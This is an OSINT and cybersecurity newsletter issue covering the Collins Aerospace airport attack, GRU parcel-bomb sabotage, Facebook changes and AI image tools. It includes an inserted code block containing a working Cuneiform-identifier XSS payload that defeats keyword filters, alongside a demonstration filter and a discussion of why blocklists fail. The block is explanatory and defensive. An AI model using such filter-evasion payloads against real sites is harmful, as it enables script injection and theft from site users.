VN#027

Sabotages, Facebook changes, AI, Airport Cyberattack ✈️

Hi Everyone,

This week I attended an event EUCrimACon 2025 organized by Europol for Crime Intelligence Analysts - a truly valuable experience.

I had the chance to exchange insights with participants from around the world, from Brazil to Australia. The conference covered methodology topics, including the use of Structured Analytic Techniques (SATs), automated data collection combined with more understandable Social Network Analysis (SNA), case studies from various investigations, and aspects of intelligence work such as extremism, terrorism, counterintelligence, and hybrid warfare. A clear standout topic in both presentations and networking was AI. For instance, Canadian law enforcement agencies have implemented AI solutions at the workflow level, with agents supporting Analysts in cases such as Child Exploitation Analysis - covering deepfake child actors, facial recognition, object identification and assisting in investigations involving offenders or content sharing.

I’m proud of my team at Frontstory[.]pl & VSquare: while I was away at the event, they wrapped up our latest investigation into sabotage incidents in Central Europe. You’ll find it below!

Cybersecurity News 

  • Cyberattack Disrupts Major European Airports: On Sep 19, a cyberattack hit Collins Aerospace’s MUSE common-use passenger processing platform, disrupting check-in, boarding, and baggage handling at major European airport hubs (London Heathrow, Brussels, Berlin, and Dublin). Airlines fell back to manual check-in, safety screening was unaffected, and at the time of writing the threat actors behind the event had not been identified. Collins Aerospace, a subsidiary of RTX (formerly Raytheon Technologies), is a key supplier to the aviation industry and was awarded a NATO contract for command-and-control software just days before the incident. Its systems are widely deployed in major hubs.

    • In 2024, DNSViz rated some collinsaerospace[.]com DNS records as insecure. In DNSSEC terms, insecure means the name is unsigned (no DS record in the parent zone and no RRSIGs to validate), which is the state of most zones on the internet and is not by itself evidence of compromise; it does mean a validating resolver cannot detect spoofed answers for those names. You can re-check with DNSViz or with a validating resolver using dig +dnssec or delv.
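To make those tool verdicts concrete, here is an added example (not from this newsletter and not DNSViz's code) that classifies the text output of dig +dnssec into the same vocabulary: secure, insecure, signed-but-unvalidated, or bogus. The three dig transcripts are constructed samples in dig's text format, example.net is only a placeholder name, and nothing in the block touches the network.

```javascript
// Added example (not from the newsletter or DNSViz): classify `dig +dnssec` output.
// The three transcripts below are constructed samples in dig's text format; nothing
// here touches the network. example.net is a placeholder name.

const SAMPLE_SECURE = `; <<>> DiG 9.18.24 <<>> +dnssec example.net A
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 40211
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1

;; ANSWER SECTION:
example.net.\t3600\tIN\tA\t203.0.113.10
example.net.\t3600\tIN\tRRSIG\tA 13 2 3600 20251001000000 20250901000000 12345 example.net. c29tZXNpZw==
`;

const SAMPLE_INSECURE = `; <<>> DiG 9.18.24 <<>> +dnssec example.net A
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 40212
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; ANSWER SECTION:
example.net.\t3600\tIN\tA\t203.0.113.10
`;

const SAMPLE_BOGUS = `; <<>> DiG 9.18.24 <<>> +dnssec example.net A
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 40213
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
`;

// Records between ";; ANSWER SECTION:" and the next blank line (comment lines skipped).
function answerSection(text) {
  const lines = text.split('\n');
  const start = lines.findIndex((l) => l.startsWith(';; ANSWER SECTION:'));
  if (start < 0) return [];
  const out = [];
  for (const line of lines.slice(start + 1)) {
    if (line.trim() === '') break;
    if (!line.startsWith(';')) out.push(line);
  }
  return out;
}

// Pull the three facts that matter out of dig's text: the response status, the
// header flags, and the number of RRSIG records in the answer section.
function parseDigOutput(text) {
  const status = (text.match(/status:\s*([A-Z]+)/) || [])[1] || 'UNKNOWN';
  const flagMatch = text.match(/;;\s*flags:\s*([a-z ]*);/);
  const flags = flagMatch ? flagMatch[1].trim().split(/\s+/).filter(Boolean) : [];
  const answer = answerSection(text);
  const rrsigs = answer.filter((line) => /\sIN\s+RRSIG\s/.test(line)).length;
  return { status, flags, rrsigs, answerRecords: answer.length };
}

// Map the parsed response onto DNSViz-style vocabulary.
function dnssecStatus(text) {
  const { status, flags, rrsigs } = parseDigOutput(text);
  if (status === 'SERVFAIL') return 'bogus-or-error'; // validator refused the answer; rerun with +cd to inspect
  if (flags.includes('ad')) return 'secure';          // AD bit: the resolver validated the chain of trust
  if (rrsigs > 0) return 'signed-unvalidated';        // signatures present, but this resolver did not validate
  return 'insecure';                                  // no RRSIGs: unsigned name, nothing for a validator to check
}
```

The AD bit is only ever set by a validating resolver, so point the real command at one (for example dig +dnssec @1.1.1.1) or a signed zone will show up as signed-unvalidated. On a SERVFAIL, repeat the query with +cd (checking disabled) to retrieve the records and the failing RRSIG anyway.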

Vulnerabilities & Exploits & Hacks

  • Fake FBI Crime Portals Trick Users: Cybercriminals are impersonating FBI complaint websites to steal personal data and money. Find out more.

  • Cuneiform-Alphabet XSS Payload Bypasses Filters: The VIEH Group shared an XSS payload written with ancient Cuneiform characters, which evades traditional signature-based filters that look for ASCII keywords. Find out more.
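Why such a payload gets past a keyword filter, as an added example that is not the VIEH Group's payload or code: ES2015+ engines accept Unicode letters, including the Cuneiform block (U+12000 and up), as identifiers, and the strings "false" and "true" can be coerced out of an empty array alone, so the function name is spelled at runtime and the word alert never appears in the source. The naive filter, the fake global object, and the self binding that stands in for the browser's window are constructed for this example so it runs under Node.

```javascript
// Added example (not the VIEH Group's code): why a Cuneiform-identifier payload
// defeats a keyword filter. The filter, the fake global object and the `self`
// binding are constructed here; in a browser `self` is simply window.

// A naive signature filter of the kind such payloads defeat. Returns true if allowed.
function naiveXssFilter(payload) {
  return !/alert|eval|script|onerror|javascript:/i.test(payload);
}

// Cuneiform signs are category Lo, so they are legal JavaScript identifiers.
function cuneiformIsIdentifier() {
  return new Function('𒀀', 'return 𒀀 * 2')(21) === 42;
}

// Payload: 𒀀 = [], 𒀁 = "false", 𒀂 = "true"; the name is spelled from their characters:
//   "false"[1] "false"[2] "true"[3] "true"[1] "true"[0]  ->  a l e r t
// The last expression looks the name up on the global object and calls it with 1.
const PAYLOAD =
  '𒀀=[],𒀁=!𒀀+𒀀,𒀂=!!𒀀+𒀀,' +
  '𒀃=𒀁[1]+𒀁[2]+𒀂[3]+𒀂[1]+𒀂[0],' +
  'self[𒀃](1)';

// The same attack written plainly, for comparison with the filter.
const PLAIN_PAYLOAD = 'self.alert(1)';

// Run a payload against a stand-in for the browser global object and record what
// it calls, so the example runs in Node without a real alert().
function runPayload(payload) {
  const calls = [];
  const fakeGlobal = { alert: (x) => calls.push(['alert', x]) };
  new Function('self', 'return ' + payload)(fakeGlobal);
  return calls;
}
```

Adding self to the blocklist does not help: this, window, globalThis, frames, top, parent and []["constructor"]["constructor"] all reach the same object, and the function name is computed rather than written. The defence is contextual output encoding and a Content Security Policy, not signatures on the payload text.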

Threat Hunting & Malware

  • Emoji Malware Demonstrates Novel Delivery Tricks: Security researchers shared malware disguised using emojis to evade detection and confuse users. Find out more.

  • Formbook Malware Exploits CVE-2017-11882 via RTF: The Formbook infostealer continues to spread through RTF documents that exploit CVE-2017-11882, a 2017 memory-corruption bug in Microsoft Office’s legacy Equation Editor (EQNEDT32.EXE), showing how long-patched exploits persist in the wild. Find out more.

Acquisitions & Funding

  • Hack The Box acquires LetsDefend: On September 16, 2025, Hack The Box (HTB) announced its acquisition of LetsDefend, a leading blue team upskilling platform known for hands-on SOC simulations and a growing community. Find out more.

    • HTB also plans to train AI on user data.

  • CrowdStrike acquires Pangea to tackle AI-Driven threats: With AI agents outnumbering humans and operating autonomously, CrowdStrike sees “conversations” as the new attack surface, particularly indirect prompt injection attacks that exploit AI assistants. Find out more.

  • Silent Push raises $10M Series B to expand preemptive cybersecurity. Find out more.

Other

  • CompTIA launches SecAI+ Beta Exam: IT professionals with 3–4 years experience, including 2 years in cybersecurity, can join the beta to help develop the new AI-focused SecAI+ certification; participants must qualify and complete the exam by October 17, 2025, to receive an incentive, with the beta period ending October 31, 2025. CompTIA Survey.

📰Reports

  • LinkedIn Intelligence Report 2025: Report by GoodCall analyzing the defense, military technology, and aerospace sectors in the Czech Republic.

  • Annual Report 2024: Report by the International Centre for Counter-Terrorism (ICCT).

Espionage & Counterintelligence

  • Israel weighed killing Iran’s Supreme Leader: Secret talks during the early days of the June war revealed that Israel considered assassinating Ali Khamenei. Find out more.

  • Moldovan ex-intel officer charged with treason: Alexandru Bălan is under investigation by Romania’s Directorate for Investigating Organized Crime and Terrorism (DIICOT), accused of leaking secrets to the Belarusian KGB; he was questioned in Bucharest. Find out more. (.ro)

  • Germany warns against Russian recruitment: BfV (Germany’s domestic intelligence agency) launches campaign urging citizens “Don’t become a disposable agent.” Find out more. 

  • Russian jets over Petrobaltic platform: Two Russian fighters carried out a provocative low flyover of a Petrobaltic platform in the Baltic Sea, an action intended to raise concern and create political confusion. Find out more.

  • Russia’s elite drone unit revealed: RFE/RL uncovers secret “Rubicon” group inside Russia’s drone warfare operations. Find out more.

Sabotages in Central Europe

Our latest investigation: Sabotage in Central Europe – Russia’s GRU Explosive Parcels. Russian GRU operatives organized the 2024 parcel bombings across Europe, hiding explosives in ordinary DHL and DPD shipments. Packages disguised as cosmetics, sex toys, or massage pillows detonated in Leipzig (Germany), Jabłonowo (Poland), and Birmingham (UK).

Details of the most dangerous Russian intelligence operation:
VSquare and Frontstory[.]pl, together with our international partners Re:Baltica (Latvia), LRT (Lithuania), Delfi (Estonia), and The Insider, traced the plot over six months. We identified several people involved in transporting the bombs on behalf of the GRU and reconstructed the route the explosive packages took: before they exploded, they crossed the borders of several EU countries multiple times without arousing suspicion.

GRU remotely recruited Russian and Ukrainian nationals to carry out these acts, and the operation was also linked to arson attacks in Poland and Lithuania. The ringleader was a convicted smuggler of radioactive materials.

👉️ Read the full text in English, along with a shorter English version featuring excellent visuals created by my colleague - Data Journalist 👏 and our Polish text.

SOCMINT

  • Facebook Removes Group Chats from Messenger: Facebook is discontinuing its Community Chats feature in Messenger, notifying admins as the platform shifts focus back to keeping discussions within Facebook itself. During investigations of illicit content, especially in seemingly inactive or “clean” Facebook groups, these chats were a goldmine - allowing easy identification of group admins, tracking information flow, or discovering private Telegram and Signal groups.

    • After the announcement, there’s a noticeable migration of discussions to Discord.

    Random example of a group

  • Facebook Removes Post Search: Facebook has removed the ability to search posts, limiting search results to people, videos, Marketplace, pages, groups, and events.

  • Instagram Tests Profile Photos in Push Notifications: Instagram is experimenting with iOS push notifications that show users’ profile photos. Each notification fetches the image, allowing Meta to track impressions and collect detailed device data, raising privacy concerns.

AI

  • AI can now create incredibly realistic photos that could be mistaken for real life. You can find the full prompt and a step-by-step guide to making this image here.

    Author of this prompt/photo: Ruben Hassid

    • AI can also age people down in seconds to produce a perfectly realistic teen photo, as Jessica showed on her LinkedIn when she transformed herself into a teenager, prompting the question: would you let your child talk to this person online?

OSINT Section

Tools

AI Image Detection Tools

  • AI or Not (paid): Shows possible sources of an image and flags AI-generated content; interesting feature but still under development.

  • Image Whisperer (free): Offers basic AI image detection capabilities for free.

  • Detectron2 is a computer vision library developed by Facebook AI Research for object detection, classification, tracking, and segmentation of objects from the background in images and videos. It identifies object categories, locates them within a scene, and analyzes their movement over time; note that it finds objects in an image rather than judging whether the image itself is AI-generated.

Privacy

  • Tor project beta VPN: Tor releases a beta VPN for Android with per-app routing, IP masking, and .onion support. Experimental and potentially unstable, not yet safe for sensitive use.

  • Proton adds Monero payments: Proton VPN, Mail, Drive, Pass, and Unlimited will soon allow users to pay with Monero.

  • LinkedIn privacy AI use: From November 4, LinkedIn will use your posts to train its AI by default unless you disable this in your privacy settings by November 3.

Google Updates

  • Google LERS breach: A group named Scattered Lapsus$ Hunters accessed Google’s Law Enforcement Request System (LERS) through a fraudulent account, but no requests were submitted before the account was disabled; Google has confirmed the incident.

  • Google’s Nanobanana AI Impresses: Google’s new Nanobanana model demonstrates capabilities that outpace Photoshop in several creative AI tasks. Photoshop is now officially behind.

  • Google Discover Tests Showing X Posts from Followers: Google is experimenting with showing posts from X (formerly Twitter) accounts that users follow directly in Discover, aiming for more personalized content feeds.

Darknet

  • FBI Arrests Michigan Tor Operator Again: Conrad Rockenhaus, a disabled U.S. veteran and founder of GreyPony IT, was re-arrested on September 4, 2025, after refusing FBI requests to decrypt his Tor exit node. He previously spent over three years in pre-trial detention. Analysis of the case is on YouTube.

  • TradeOgre Wallets Seized: Canadian authorities seized $40 million from TradeOgre wallets. The exchange was previously flagged by Europol for facilitating cash-outs by ransomware groups such as Conti and LockBit via low-KYC exchanges.

Upcoming CyberSec / OSINT Events

Free

Webinars

  • Global Threats Update – Regional Overviews of Maritime Security – Tuesday, September 23, 2025 | 10:00 AM – 10:45 AM | Online. Presented by Risk Intelligence. Registration

  • Feedly – AI Prompting Techniques for CTI Analysts – Wednesday, September 24, 2025 | 9:00 AM PT | Online. Registration

  • Digital Breadcrumbs, Part 2 – OSINT & SOCMINT for Financial Crimes – Wednesday, September 24, 2025 | 1:00 PM EST | Online. Hosted by Spokeo Law Enforcement. Registration, link2

  • Intro to Mapmaking for Journalists – Saturday, September 27, 2025 | Online. Learn to turn geospatial data into interactive maps. Registration.

  • ChildSafeNet & Asia Centre – Digital Security Training– Thursday, October 9, 2025 | 10:00 AM – 12:00 Noon Nepal Time | Online, Asia Pacific Centre. Registration

  • 9th Global Conference on Criminal Finances and Cryptoassets – Tuesday–Wednesday, October 28–29, 2025 | Hybrid at UNODC Headquarters, Vienna, Austria. Jointly organized by Europol, UNODC, and the Basel Institute on Governance. More Info

    • If you have a chance to go, this would be a cool event to attend.

On Demand

  • AML Investigations and the Effective Use of Open Source Intelligence (OSINT). Learn how to leverage OSINT for AML investigations with ACAMS. Watch Here

CTFs

  • Trace Labs Search Party OSINT CTF Webinar – Sunday, September 28, 2025. Registration

  • Cybercrime CTF for Law Enforcement Agencies – c0c0n LEA CTF 2025, October 10–11, 2025 | India. Practical CTF event for law enforcement cybercrime teams. More Info

Conferences & Training

  • Cybersecurity Industrial Applications Summer School – October 12–15, 2025 | Tirana, Albania. Program chaired by the University of Western Macedonia, with organizing chairs from EPOKA University, the Albanian Academy of Sciences, and Aristotle University of Thessaloniki. More Info

  • Mega Sekurak Hacking Party 2025 – Monday, October 20, 2025 | Kraków, Poland. More Info

  • Palo Alto One-Day Intel Workshop – Tuesday, October 21, 2025 | 9:00 AM (~9 hours) | Palo Alto, California. Organized by MAX Security Solutions; master intelligence collection, assessment, and operational decision-making. More Info

  • ISS World Latin America – Intelligence Support Systems, October 21–23, 2025 | Panama City. Training on electronic surveillance, social media/darknet monitoring, and cyber threat detection. More Info

🙃Bonus

This time’s recommendation

The Intelligence Bible: A Comprehensive Guide to Intelligence by Ollie Wright - an essential read for Corporate Risk Management and Protective Intelligence practitioners.